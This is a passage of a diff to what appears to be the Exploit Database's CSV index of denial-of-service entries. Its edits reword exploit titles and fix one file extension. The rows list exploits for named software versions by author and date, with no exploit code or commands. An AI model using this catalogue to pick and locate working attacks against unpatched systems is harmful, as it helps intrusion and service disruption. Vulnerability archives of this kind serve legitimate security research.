Overflow",2003-08-21,nimber@designer.ru,multiple,dos,0 23051,platforms/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service",2003-08-22,"Blue eyeguy4u",multiple,dos,0 @@ -3341,7 +3343,7 @@ id,file,description,date,author,platform,type,port 25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service Vulnerabilities",2005-03-05,ports,windows,dos,0 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0 25231,platforms/windows/dos/25231.txt,"Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service",2005-03-17,"Hongzhen Zhou",windows,dos,0 -25234,platforms/linux/dos/25234.sh,"Linux Kernel 2.4.x/2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,dos,0 +25234,platforms/linux/dos/25234.sh,"Linux Kernel 2.4.x/2.6.x - Multiple ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,dos,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0 25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - 'TSShutdn.exe' Remote Denial of Service",2005-03-23,"Juha-Matti Laurio",windows,dos,0 @@ -3394,7 +3396,7 @@ id,file,description,date,author,platform,type,port 25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service",2005-05-28,"Luigi Auriemma",multiple,dos,0 25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 - Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",multiple,dos,0 -25807,platforms/aix/dos/25807.txt,"IBM AIX 5.x - Invscout Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos,0 +25807,platforms/aix/dos/25807.txt,"IBM AIX 5.x - 'Invscout' Local Buffer Overflow",2005-06-09,"Computer Academic Underground",aix,dos,0 25809,platforms/osx/dos/25809.py,"CodeBlocks 12.11 (OSX) - Crash (PoC)",2013-05-29,ariarat,osx,dos,0 25837,platforms/linux/dos/25837.txt,"Monkey HTTPd 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0 26292,platforms/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS - Denial of Service",2005-08-22,"Mella Marco",osx,dos,0 @@ -3407,7 +3409,7 @@ id,file,description,date,author,platform,type,port 25967,platforms/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",hardware,dos,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 25974,platforms/osx/dos/25974.txt,"Apple Mac OSX Server - DirectoryService Buffer Overflow",2013-06-05,"Core Security",osx,dos,0 -25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Unspecified Buffer Overflow",2005-07-15,"Michal Zalewski",windows,dos,0 +25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering Buffer Overflow",2005-07-15,"Michal Zalewski",windows,dos,0 25992,platforms/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 - '.JPEG' Image Rendering CMP Fencepost Denial of Service",2005-07-15,"Michal Zalewski",windows,dos,0 26005,platforms/windows/dos/26005.pl,"Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow",2005-07-19,kcope,windows,dos,0 26010,platforms/windows/dos/26010.py,"Quick TFTP Server Pro 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0 @@ -3472,7 +3474,7 @@ id,file,description,date,author,platform,type,port 26833,platforms/hardware/dos/26833.txt,"Cisco Catalyst Switches (Multiple Devices) - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26834,platforms/hardware/dos/26834.txt,"Westell Versalink 327W - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 26835,platforms/hardware/dos/26835.txt,"Scientific Atlanta DPX2100 Cable Modem - LanD Packet Denial of Service",2005-12-14,"Justin M. Wray",hardware,dos,0 -26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos,0 +26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Memory Corruption (MS06-012)",2005-12-19,ad@heapoverflow.com,windows,dos,0 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - Denial of Service (PoC)",2013-07-16,kingcope,linux,dos,0 26887,platforms/linux/dos/26887.rb,"rpcbind - CALLIT procedure UDP Crash (PoC)",2013-07-16,"Sean Verity",linux,dos,0 26891,platforms/windows/dos/26891.py,"Light Audio Mixer 1.0.12 - '.wav' Crash (PoC)",2013-07-16,ariarat,windows,dos,0 @@ -3506,7 +3508,7 @@ id,file,description,date,author,platform,type,port 27145,platforms/linux/dos/27145.txt,"GNOME Evolution 2.2.3/2.3.x - Inline XML File Attachment Buffer Overflow",2006-01-28,"Mike Davis",linux,dos,0 27159,platforms/multiple/dos/27159.txt,"Fcron 3.0 - Convert-FCronTab Local Buffer Overflow",2006-02-01,"Adam Zabrocki",multiple,dos,0 27171,platforms/multiple/dos/27171.txt,"Sun ONE Directory Server 5.2 - Remote Denial of Service",2006-02-08,"Evgeny Legerov",multiple,dos,0 -27196,platforms/multiple/dos/27196.txt,"IBM Tivoli Directory Server 6.0 - Unspecified LDAP Memory Corruption",2006-02-11,"Evgeny Legerov",multiple,dos,0 +27196,platforms/multiple/dos/27196.txt,"IBM Tivoli Directory Server 6.0 - LDAP Memory Corruption",2006-02-11,"Evgeny Legerov",multiple,dos,0 27210,platforms/multiple/dos/27210.txt,"eStara SoftPhone 3.0.1 - SIP SDP Message Handling Format String Denial of Service",2006-02-14,ZwelL,multiple,dos,0 27211,platforms/multiple/dos/27211.txt,"eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities",2006-02-14,ZwelL,multiple,dos,0 27212,platforms/multiple/dos/27212.txt,"Isode M-Vault Server 11.3 - LDAP Memory Corruption",2006-02-14,"Evgeny Legerov",multiple,dos,0 @@ -3539,7 +3541,7 @@ id,file,description,date,author,platform,type,port 27639,platforms/multiple/dos/27639.txt,"W3C Amaya 9.4 - textarea rows Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 27640,platforms/multiple/dos/27640.txt,"W3C Amaya 9.4 - legend color Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 27641,platforms/linux/dos/27641.txt,"Opera Web Browser 8.52 - Stylesheet Attribute Buffer Overflow",2006-04-13,"SEC Consult",linux,dos,0 -27969,platforms/multiple/dos/27969.c,"Quake 3 Engine - CL_ParseDownload Remote Buffer Overflow",2006-06-05,"Luigi Auriemma",multiple,dos,0 +27969,platforms/multiple/dos/27969.c,"Quake 3 Engine - 'CL_ParseDownload' Remote Buffer Overflow",2006-06-05,"Luigi Auriemma",multiple,dos,0 27971,platforms/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 - Frameset Memory Corruption",2006-06-05,Kil13r,windows,dos,0 27668,platforms/multiple/dos/27668.c,"Neon Responders 5.4 - Remote Clock Synchronization Denial of Service",2006-04-10,"Stefan Lochbihler",multiple,dos,0 27670,platforms/linux/dos/27670.txt,"Xine 0.9/1.0 - Playlist Handling Remote Format String",2006-04-18,c0ntexb,linux,dos,0 @@ -3661,7 +3663,7 @@ id,file,description,date,author,platform,type,port 28683,platforms/linux/dos/28683.txt,"HylaFAX+ 5.2.4 > 5.5.3 - Buffer Overflow",2013-10-02,"Dennis Jenkins",linux,dos,0 28735,platforms/windows/dos/28735.pl,"MailEnable 2.x - SMTP NTLM Multiple Authentication Vulnerabilities",2006-11-29,mu-b,windows,dos,0 28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service",2006-10-03,"Dave Gil",hardware,dos,0 -28775,platforms/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 +28775,platforms/linux/dos/28775.pl,"Zabbix 1.1.2 - Multiple Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow",2006-09-14,JAAScois,windows,dos,0 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 @@ -3711,7 +3713,7 @@ id,file,description,date,author,platform,type,port 29402,platforms/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow Denial of Service Vulnerabilities",2007-01-08,kian.mohageri,hardware,dos,0 29406,platforms/solaris/dos/29406.c,"Sun Solaris 9 - RPC Request Denial of Service",2007-01-09,"Federico L. Bossi Bonin",solaris,dos,0 29441,platforms/osx/dos/29441.txt,"Apple Mac OSX 10.4.8 - DMG UFS FFS_MountFS Integer Overflow",2007-01-10,LMH,osx,dos,0 -29443,platforms/windows/dos/29443.py,"VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service (2)",2007-01-11,shinnai,windows,dos,0 +29443,platforms/windows/dos/29443.py,"VideoLAN VLC Media Player 0.8.6a - Denial of Service (2)",2007-01-11,shinnai,windows,dos,0 29444,platforms/windows/dos/29444.pl,"CA BrightStor ARCserve Backup - Message Engine/Tape Engine Remote Buffer Overflow",2007-01-11,"Tenable NS",windows,dos,0 29445,platforms/windows/dos/29445.rb,"Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)",2013-11-05,"Necmettin COSKUN",windows,dos,0 29447,platforms/windows/dos/29447.txt,"WinZip 9.0 - Command Line Remote Buffer Overflow",2007-01-12,"Umesh Wanve",windows,dos,0 @@ -3735,7 +3737,7 @@ id,file,description,date,author,platform,type,port 29532,platforms/osx/dos/29532.txt,"Apple Installer Package 2.1.5 - Filename Format String",2007-01-27,LMH,osx,dos,0 29535,platforms/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption",2007-01-27,kf,osx,dos,0 29536,platforms/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos,0 -29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0 +29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Remote Denial of Service",2007-01-30,kcope,solaris,dos,0 39839,platforms/osx/dos/39839.txt,"Apple QuickTime - '.mov' Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0 @@ -3767,7 +3769,7 @@ id,file,description,date,author,platform,type,port 29717,platforms/linux/dos/29717.txt,"radscan conquest 8.2 - Multiple Vulnerabilities",2007-03-07,"Luigi Auriemma",linux,dos,0 29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 - Document.Cookie Path Argument Denial of Service",2007-03-08,"Nicolas DEROUET",linux,dos,0 29721,platforms/windows/dos/29721.pl,"FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 -29723,platforms/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - Unspecified GIF Handling Denial of Service",2007-03-09,Samuel,linux,dos,0 +29723,platforms/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - '.GIF' Handling Denial of Service",2007-03-09,Samuel,linux,dos,0 29724,platforms/linux/dos/29724.txt,"MySQL 5.0.x - Single Row SubSelect Remote Denial of Service",2007-03-09,S.Streichsbier,linux,dos,0 29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service",2007-03-13,"Michal Majchrowicz",windows,dos,0 29740,platforms/windows/dos/29740.txt,"MiniGZip - Controls File_Compress Buffer Overflow",2007-03-14,starcadi,windows,dos,0 @@ -3806,7 +3808,7 @@ id,file,description,date,author,platform,type,port 29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 - XRender Extension Divide by Zero Denial of Service",2007-05-01,"Derek Abdine",linux,dos,0 29940,platforms/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 - Href Denial of Service",2007-05-01,"Carl Hardwick",windows,dos,0 29942,platforms/windows/dos/29942.c,"Atomix MP3 - '.MP3' File Buffer Overflow",2007-05-02,preth00nker,windows,dos,0 -29943,platforms/windows/dos/29943.c,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",windows,dos,0 +29943,platforms/windows/dos/29943.pl,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",windows,dos,0 29949,platforms/windows/dos/29949.c,"Zoo 2.10 - .ZOO Compression Algorithm Remote Denial of Service",2007-05-04,Jean-Sébastien,windows,dos,0 30080,platforms/linux/dos/30080.c,"Linux Kernel 2.6.x - VFat Compat IOCTLS Local Denial of Service",2007-05-24,"Bart Oldeman",linux,dos,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,linux,dos,0 @@ -3920,7 +3922,7 @@ id,file,description,date,author,platform,type,port 30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 - NULL-Pointer Dereference Denial of Service",2008-01-04,"Luigi Auriemma",multiple,dos,0 31002,platforms/linux/dos/31002.txt,"Xine-Lib 1.1.9 - 'rmff_dump_cont()' Remote Heap Buffer Overflow",2008-01-09,"Luigi Auriemma",linux,dos,0 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 -31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0 +31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0 31021,platforms/osx/dos/31021.html,"Apple Safari 2.0.4 - KHTML WebKit Remote Denial of Service",2008-01-12,"David Barroso",osx,dos,0 31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 - Invalid '.GIF' File LWZ Minimum Code Size Remote Buffer Overflow",2008-01-23,"Gynvael Coldwind",linux,dos,0 31057,platforms/ios/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,ios,dos,0 @@ -3983,9 +3985,9 @@ id,file,description,date,author,platform,type,port 31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos,0 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - '.JPEG' File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0 31550,platforms/bsd/dos/31550.c,"BSD (Multiple Distributions) - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 -31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 -31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 -31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 +31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 +31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 +31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31563,platforms/windows/dos/31563.txt,"SLmail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)",2008-04-08,Whitecell,windows,dos,0 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0 @@ -4198,17 +4200,17 @@ id,file,description,date,author,platform,type,port 33175,platforms/windows/dos/33175.txt,"Microsoft Internet Explorer 6/7/8 - 'li' Element Denial of Service (3)",2007-02-07,trevordixon,windows,dos,0 33176,platforms/linux/dos/33176.rb,"ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial of Service",2009-08-18,"Brad Antoniewicz",linux,dos,0 33182,platforms/multiple/dos/33182.txt,"Live For Speed S2 - Duplicate Join Packet Remote Denial of Service",2009-08-23,"Luigi Auriemma",multiple,dos,0 -33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service (1)",2009-08-25,"Francis Provencher",novell,dos,0 -33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Unspecified Remote Denial of Service (2)",2009-08-25,"Francis Provencher",novell,dos,0 -33185,platforms/windows/dos/33185.html,"Nokia Lotus Notes Connector - 'lnresobject.dll' Unspecified Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 +33183,platforms/novell/dos/33183.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Remote Denial of Service (1)",2009-08-25,"Francis Provencher",novell,dos,0 +33184,platforms/novell/dos/33184.html,"Novell Client 4.91.5 - ActiveX Control 'nwsetup.dll' Remote Denial of Service (2)",2009-08-25,"Francis Provencher",novell,dos,0 +33185,platforms/windows/dos/33185.html,"Nokia Lotus Notes Connector - 'lnresobject.dll' Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0 33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x - 'drivers/char/tty_ldisc.c' Null Pointer Dereference Denial of Service",2009-08-19,"Eric W. Biederman",linux,dos,0 33205,platforms/windows/dos/33205.pl,"Nokia MultiMedia Player 1.1 - Remote Denial of Service",2009-09-01,"opt!x hacker",windows,dos,0 33216,platforms/hardware/dos/33216.txt,"Check Point Endpoint Security - Full Disk Encryption RDP Connection Denial of Service",2009-09-09,"Tim Medin",hardware,dos,0 33220,platforms/windows/dos/33220.txt,"FileCOPA FTP Server 5.01 - 'NOOP' Denial of Service",2009-09-15,"Asheesh kumar Mani Tripathi",windows,dos,0 33221,platforms/windows/dos/33221.html,"Novell Groupwise Client 7.0.3.1294 - 'gxmim1.dll' ActiveX Control Buffer Overflow",2009-09-15,"Francis Provencher",windows,dos,0 -33222,platforms/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Unspecified Resource Exhaustion (Denial of Service)",2009-09-15,"Buildbot Builder",linux,dos,0 -33223,platforms/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Unspecified Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 -33224,platforms/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Unspecified Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 +33222,platforms/linux/dos/33222.txt,"Wireshark 1.2.1 - OpcUa Dissector Resource Exhaustion (Denial of Service)",2009-09-15,"Buildbot Builder",linux,dos,0 +33223,platforms/linux/dos/33223.txt,"Wireshark 1.2.1 - TLS Dissector 1.2 Conversation Handling Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 +33224,platforms/linux/dos/33224.txt,"Wireshark 1.2.1 - GSM A RR Dissector packet.c Remote Denial of Service",2009-09-15,"Buildbot Builder",linux,dos,0 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 - 'emimap4.dll' ActiveX Control Remote Code Execution",2009-09-15,"Francis Provencher",windows,dos,0 33228,platforms/linux/dos/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow",2009-09-16,"Xiao Guangrong",linux,dos,0 33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x - 'strfmon()' Integer Overflow",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0 @@ -4520,7 +4522,7 @@ id,file,description,date,author,platform,type,port 36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 - Remote Denial of Service",2011-12-07,"Luigi Auriemma",windows,dos,0 36431,platforms/windows/dos/36431.pl,"FastStone Image Viewer 5.3 - '.tga' Crash (PoC)",2015-03-19,"ITDefensor Vulnerability Research Team",windows,dos,0 36433,platforms/windows/dos/36433.txt,"Yahoo! CD Player - ActiveX Control 'open()' Method Stack Buffer Overflow",2011-04-20,shinnai,windows,dos,0 -36443,platforms/windows/dos/36443.txt,"Opera Web Browser < 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities",2011-12-12,anonymous,windows,dos,0 +36443,platforms/windows/dos/36443.txt,"Opera Web Browser < 11.60 - Denial of Service / Multiple Vulnerabilities",2011-12-12,anonymous,windows,dos,0 40453,platforms/multiple/dos/40453.py,"ISC BIND 9 - Denial of Service",2016-10-04,Infobyte,multiple,dos,53 36545,platforms/linux/dos/36545.txt,"Linux Kernel 3.1.8 - KVM Local Denial of Service",2011-12-29,"Stephan Sattler",linux,dos,0 36570,platforms/multiple/dos/36570.txt,"Rockwell Automation FactoryTalk Activation Server - Multiple Denial of Service Vulnerabilities",2012-01-17,"Luigi Auriemma",multiple,dos,0 @@ -4781,7 +4783,7 @@ id,file,description,date,author,platform,type,port 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 -38419,platforms/windows/dos/38419.txt,"SmallFTPd - Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 +38419,platforms/windows/dos/38419.txt,"SmallFTPd - Denial of Service",2013-04-03,AkaStep,windows,dos,0 38420,platforms/multiple/dos/38420.txt,"Google Chrome - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service",2013-04-05,anonymous,linux,dos,0 38422,platforms/linux/dos/38422.txt,"Apache Subversion - Remote Denial of Service",2013-04-05,"Greg McMullin",linux,dos,0 @@ -4983,13 +4985,13 @@ id,file,description,date,author,platform,type,port 39366,platforms/multiple/dos/39366.c,"Apple Mac OSX / iOS Kernel - iokit Registry Iterator Manipulation Double-Free",2016-01-28,"Google Security Research",multiple,dos,0 39367,platforms/osx/dos/39367.c,"Apple Mac OSX - io_service_close Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 39368,platforms/osx/dos/39368.c,"Apple Mac OSX - 'gst_configure' Kernel Buffer Overflow",2016-01-28,"Google Security Research",osx,dos,0 -39369,platforms/osx/dos/39369.c,"Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39369,platforms/osx/dos/39369.c,"Apple Mac OSX - 'IntelAccelerator::gstqConfigure' Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39370,platforms/osx/dos/39370.c,"Apple Mac OSX Kernel - Hypervisor Driver Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 -39376,platforms/osx/dos/39376.c,"Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Exploitable Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39376,platforms/osx/dos/39376.c,"Apple Mac OSX - IOSCSIPeripheralDeviceType00 Userclient Type 12 Kernel NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39377,platforms/multiple/dos/39377.c,"Apple Mac OSX / iOS - Unsandboxable Kernel Use-After-Free in Mach Vouchers",2016-01-28,"Google Security Research",multiple,dos,0 39378,platforms/multiple/dos/39378.c,"Apple Mac OSX / iOS - NECP System Control Socket Packet Parsing Kernel Code Execution Integer Overflow",2016-01-28,"Google Security Research",multiple,dos,0 39379,platforms/multiple/dos/39379.txt,"Apple Mac OSX / iOS - Double-Delete IOHIDEventQueue::start Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 -39380,platforms/osx/dos/39380.c,"Apple Mac OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient Exploitable NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 +39380,platforms/osx/dos/39380.c,"Apple Mac OSX - OSMetaClassBase::safeMetaCast in IOAccelContext2::connectClient NULL Dereference",2016-01-28,"Google Security Research",osx,dos,0 39381,platforms/osx/dos/39381.c,"Apple Mac OSX - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0 39393,platforms/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos,0 39395,platforms/windows/dos/39395.txt,"WPS Office < 2016 - '.ppt' Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0 @@ -5144,8 +5146,8 @@ id,file,description,date,author,platform,type,port 39829,platforms/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",multiple,dos,0 39830,platforms/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 39831,platforms/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 -39832,platforms/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple Issues 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 -39833,platforms/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple Issues 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 +39832,platforms/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 +39833,platforms/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 39834,platforms/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",multiple,dos,0 39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0 @@ -5163,13 +5165,13 @@ id,file,description,date,author,platform,type,port 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0 39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Windows/OSX) - Crash (PoC)",2016-06-09,halsten,multiple,dos,0 39915,platforms/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,windows,dos,0 -39920,platforms/osx/dos/39920.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 +39920,platforms/osx/dos/39920.c,"Apple Mac OSX Kernel - Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 39921,platforms/android/dos/39921.txt,"Google Android - '/system/bin/sdcard' Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0 -39922,platforms/osx/dos/39922.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in 